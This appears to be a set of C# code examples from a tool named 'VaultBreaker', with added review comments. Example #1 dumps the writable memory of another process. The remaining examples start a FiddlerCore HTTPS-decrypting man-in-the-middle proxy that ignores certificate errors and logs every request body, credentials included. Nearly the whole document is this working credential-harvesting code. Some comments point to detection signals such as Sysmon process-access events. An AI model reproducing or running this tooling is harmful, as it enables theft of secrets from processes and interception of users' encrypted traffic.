예제 #1
        /// <summary>
        /// Reads the committed read/write memory regions of another process and returns
        /// their bytes concatenated into a single string (one char per byte).
        /// Nothing is written to disk by this method.
        /// </summary>
        /// <param name="proc">Target process; only <c>proc.Id</c> is used here.</param>
        /// <returns>
        /// The raw contents of every region that passed the PAGE_READWRITE / MEM_COMMIT filter.
        /// The string holds whatever the target kept in writable memory, so callers should
        /// treat it as sensitive data.
        /// </returns>
        /// <remarks>
        /// Terminates the whole program with exit code 6 if the process handle cannot be opened.
        /// NOTE(review): the handle stored in hProc is not closed anywhere in this method.
        /// NOTE(review): opening another process with memory-read access is visible to
        /// process-access telemetry (for example Sysmon Event ID 10), which is where a
        /// defender would look for this behaviour.
        /// </remarks>
        public static string dumpProcessMemory(Process proc)
        {
            DebugFunctions.writeDebug("Starting Memory Dump", true);
            //Dumps process memory, converts it to a single string and returns it. No writing to file needed.
            DebugFunctions.writeDebug("Opening Process", true);
            // Requested access is limited to querying region information and reading memory.
            IntPtr hProc = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.QueryInformation | WinAPI.ProcessAccessFlags.VirtualMemoryRead, false, proc.Id);

            DebugFunctions.writeDebug("OpenProcess Returned", true);
            // Only the 64-bit layout of MEMORY_BASIC_INFORMATION is used; the 32-bit variant is commented out below.
            WinAPI.MEMORY_BASIC_INFORMATION64 mbi = new WinAPI.MEMORY_BASIC_INFORMATION64();
            //32 bit
            //WinAPI.MEMORY_BASIC_INFORMATION mbi32 = new WinAPI.MEMORY_BASIC_INFORMATION();
            WinAPI.SYSTEM_INFO si = new WinAPI.SYSTEM_INFO();
            if (hProc == IntPtr.Zero)
            {
                //Failed.
                // NOTE(review): if WinAPI.GetLastError is a direct P/Invoke, the value may already have been
                // overwritten by the runtime; Marshal.GetLastWin32Error is the usual choice - confirm.
                Console.WriteLine("Unable to create a connection to the process! Error Code: {0}", WinAPI.GetLastError());
                Environment.Exit(6);
            }
            DebugFunctions.writeDebug("Process Handle isn't 0", true);
            // The scan range is the application address range reported by GetSystemInfo.
            WinAPI.GetSystemInfo(out si);
            IntPtr        hProc_min_addr = si.minimumApplicationAddress;
            IntPtr        hProc_max_addr = si.maximumApplicationAddress;
            long          hProc_long_min = (long)hProc_min_addr;
            long          hProc_long_max = (long)hProc_max_addr;
            int           bytesRead      = 0;
            StringBuilder sb             = new StringBuilder();

            // Walk the address space one region at a time, from the minimum to the maximum application address.
            while (hProc_long_min < hProc_long_max)
            {
                // The return value lands in bytesRead but is never checked.
                // NOTE(review): if the query fails, mbi may hold stale or zero values - confirm how the wrapper behaves.
                bytesRead = WinAPI.VirtualQueryEx(hProc, hProc_min_addr, out mbi, (uint)Marshal.SizeOf(typeof(WinAPI.MEMORY_BASIC_INFORMATION64)));
                //Console.WriteLine(mbi.AllocationBase + "\r\n" + mbi.AllocationProtect + "\r\n" + mbi.BaseAddress + "\r\n" + mbi.Protect + "\r\n" + mbi.RegionSize + "\r\n" + mbi.State + "\r\n" + mbi.Type + "\r\n" + mbi.__alignment1 + "\r\n" + mbi.__alignment2);
                //DebugFunctions.writeDebug(String.Format("Reading Memory - Current Location: {0}/{1}", hProc_long_min.ToString(), hProc_long_max.ToString()), Globals.DebugMode);
                // Exact equality: only regions whose protection is precisely PAGE_READWRITE and whose
                // state is MEM_COMMIT are copied; every other protection value is skipped.
                if (mbi.Protect == WinAPI.PAGE_READWRITE && mbi.State == WinAPI.MEM_COMMIT)
                {
                    // One managed buffer per region, sized to the whole region.
                    byte[] buffer = new byte[mbi.RegionSize];
                    // The result of the read is ignored and bytesRead is overwritten with the count for this read.
                    WinAPI.ReadProcessMemory(hProc, mbi.BaseAddress, buffer, mbi.RegionSize, ref bytesRead);
                    // The copy runs over RegionSize, not bytesRead.
                    // NOTE(review): after a failed or partial read the unread tail of the buffer
                    // (presumably still zero-filled) is appended as well - confirm.
                    for (long i = 0; i < mbi.RegionSize; i++)
                    {
                        // Each byte becomes one char with the same numeric value; no text decoding is applied.
                        sb.Append((char)buffer[i]);
                    }
                }
                //hProc_long_min += (int)Marshal.SizeOf(typeof(WinAPI.MEMORY_BASIC_INFORMATION64));
                // Advance to the next region.
                // NOTE(review): a RegionSize of 0 would leave the cursor unchanged and the loop would not terminate.
                hProc_long_min += mbi.RegionSize;
                hProc_min_addr  = new IntPtr(hProc_long_min);
            }
            //sw.Close();
            // Unlike the earlier debug calls, which pass true, this one honours Globals.DebugMode.
            DebugFunctions.writeDebug("Finished Reading Memory, returning memory string.", Globals.DebugMode);
            return(sb.ToString());
        }
예제 #2
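        /// <summary>
        /// Configures FiddlerCore as an HTTPS-decrypting proxy listening on port 8888 and starts it.
        /// </summary>
        /// <remarks>
        /// Registers <c>AfterSessionComplete</c> and an inline BeforeRequest handler before startup.
        /// The startup settings enable SSL decryption and monitoring of all connections, so
        /// request bodies that pass through the proxy are available to those handlers in clear text.
        /// </remarks>
        public static void startProxy()
        {
            // Every session seen by BeforeRequest is appended here. Nothing in this method reads
            // or trims the list, so it grows for as long as the proxy runs.
            List <Fiddler.Session> oAllSessions = new List <Fiddler.Session>();

            Fiddler.FiddlerApplication.SetAppDisplayName("VaultBreaker");
            Fiddler.FiddlerApplication.AfterSessionComplete += AfterSessionComplete;
            Fiddler.FiddlerApplication.BeforeRequest        += delegate(Fiddler.Session oS)
            {
                // Response buffering is switched off: responses are streamed to the client as
                // they arrive and cannot be modified in a BeforeResponse handler. Enable
                // buffering here only if response modification is ever required.
                oS.bBufferResponse = false;

                // lock releases the monitor even if Add throws; a bare Enter/Exit pair would
                // leave the list locked for every later request.
                lock (oAllSessions)
                {
                    oAllSessions.Add(oS);
                }
            };

            DebugFunctions.writeDebug(String.Format("Starting {0}...", Fiddler.FiddlerApplication.GetVersionString()), Globals.DebugMode);

            // SECURITY(review): upstream certificate errors are ignored, so the proxy relays
            // traffic to servers whose TLS certificate does not validate. Clients behind the
            // proxy lose server authentication for as long as it runs - confirm this is intended.
            Fiddler.CONFIG.IgnoreServerCertErrors = true;
            CONFIG.bMITM_HTTPS = true;

            FiddlerApplication.Prefs.SetBoolPref("fiddler.network.streaming.abortifclientaborts", true);

            //What port you want to listen on.
            ushort iPort = 8888;

            // NOTE(review): MonitorAllConnections presumably registers this endpoint as the
            // system proxy, which would be a host-level change visible to defenders - confirm.
            FiddlerCoreStartupSettings startupSettings =
                new FiddlerCoreStartupSettingsBuilder()
                .ListenOnPort(iPort)
                .DecryptSSL()
                .MonitorAllConnections()
                .OptimizeThreadPool()
                .Build();

            Fiddler.FiddlerApplication.Startup(startupSettings);

            FiddlerApplication.Log.LogFormat("Created endpoint listening on port {0}", iPort);
        }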
예제 #3
        /// <summary>
        /// Session-completed handler: passes the request body and method of every
        /// non-CONNECT session to the debug log.
        /// </summary>
        /// <param name="sess">The completed proxy session.</param>
        /// <remarks>
        /// The log text says "POST", but the method is not filtered: any request other than
        /// CONNECT is logged, including ones with an empty body. An earlier, disabled version
        /// of this handler logged only POST requests with a non-empty body.
        /// NOTE(review): request bodies are written verbatim, so the debug output can contain
        /// credentials and should be handled as sensitive.
        /// </remarks>
        static void AfterSessionComplete(Session sess)
        {
            // CONNECT sessions are skipped entirely.
            if (sess.RequestMethod != "CONNECT")
            {
                string requestBody = sess.GetRequestBodyAsString();
                string logLine     = String.Format("Recieved POST with the following body\r\n[DEBUG] {0}\r\n[DEBUG]{1}", requestBody, sess.RequestMethod);

                DebugFunctions.writeDebug(logLine, Globals.DebugMode);
            }
        }
예제 #4
 /// <summary>
 /// Logs a shutdown message, stops FiddlerCore, and then blocks the calling thread for 500 ms.
 /// </summary>
 public static void DoQuit()
 {
     // Fixed pause applied after Shutdown() returns.
     // NOTE(review): presumably gives FiddlerCore time to finish tearing down - confirm.
     TimeSpan settleDelay = TimeSpan.FromMilliseconds(500);

     DebugFunctions.writeDebug("Shutting down...", Globals.DebugMode);
     Fiddler.FiddlerApplication.Shutdown();
     Thread.Sleep(settleDelay);
 }